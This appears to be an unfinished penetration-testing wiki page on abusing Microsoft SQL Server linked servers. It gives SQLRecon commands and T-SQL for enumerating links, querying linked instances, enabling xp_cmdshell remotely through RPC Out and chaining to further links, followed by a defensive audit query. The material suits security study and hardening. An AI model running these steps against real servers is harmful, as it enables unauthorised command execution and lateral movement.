Links Abuse

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Useful links
  5. Recommendations

Vulnerability

TODO: Describe the vulnerability here.

Prerequisites

  • Having sysadmin rights on the Microsoft SQL instance.

Exploit

To enumerate the links configured on your instance, use the query SELECT srvname, srvproduct, rpcout FROM master..sysservers; or SQLRecon.

./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:links

To send a query to a linked instance, use SELECT * FROM OPENQUERY("$target", '$query'); or, again, SQLRecon.

./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:lquery /l:$target /c:"$query"

If RPC Out is enabled on the link, you can leverage it to enable xp_cmdshell with the following queries.

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [$target]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [$target]

You can even list any further links on your target and repeat the operation.

./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:llinks /l:$target
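The steps above depend on three settings that can be audited from the defender's side: data access on the link (OPENQUERY), RPC Out on the link (EXEC ... AT), and the login mapping the link uses. The following T-SQL is an added example, not part of the original page or of SQLRecon; it uses the standard catalog views sys.servers, sys.linked_logins, sys.server_principals and sys.configurations, and the wording of the "finding" column is an assumption chosen for illustration.

```sql
-- Added audit example (T-SQL): run on each instance that may hold linked servers.

-- 1. Linked servers, the options the steps above rely on, and their login mappings.
SELECT
    s.name                   AS linked_server,
    s.product,
    s.data_source,
    s.is_data_access_enabled,            -- needed for OPENQUERY against the link
    s.is_rpc_out_enabled,                -- needed for EXEC ('...') AT [link]
    CASE
        WHEN l.local_principal_id = 0 THEN '(default: all local logins)'
        ELSE p.name
    END                      AS local_login,
    l.uses_self_credential,              -- 1 = caller's own identity is passed to the link
    l.remote_name,                       -- fixed remote login when uses_self_credential = 0
    CASE
        WHEN s.is_rpc_out_enabled = 1
             AND l.local_principal_id = 0
             AND l.uses_self_credential = 0
            THEN 'REVIEW: RPC Out plus a fixed remote login for every local login'
        WHEN s.is_rpc_out_enabled = 1
            THEN 'REVIEW: RPC Out enabled'
        ELSE 'ok'
    END                      AS finding,  -- illustrative labels, not a product feature
    s.modify_date
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS l ON l.server_id = s.server_id
LEFT JOIN sys.server_principals AS p ON p.principal_id = l.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.is_rpc_out_enabled DESC, s.name;

-- 2. Current state of the options changed by the sp_configure calls shown above.
--    A value_in_use of 1 for xp_cmdshell that nobody can account for deserves follow-up.
SELECT name, value AS configured_value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
```

Because links can be chained, the same two queries need to be run on every instance that appears in the linked_server column, not only on the first one.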

Useful links

  • TODO: List links here.

Recommendations

  • TODO: List recommendations here.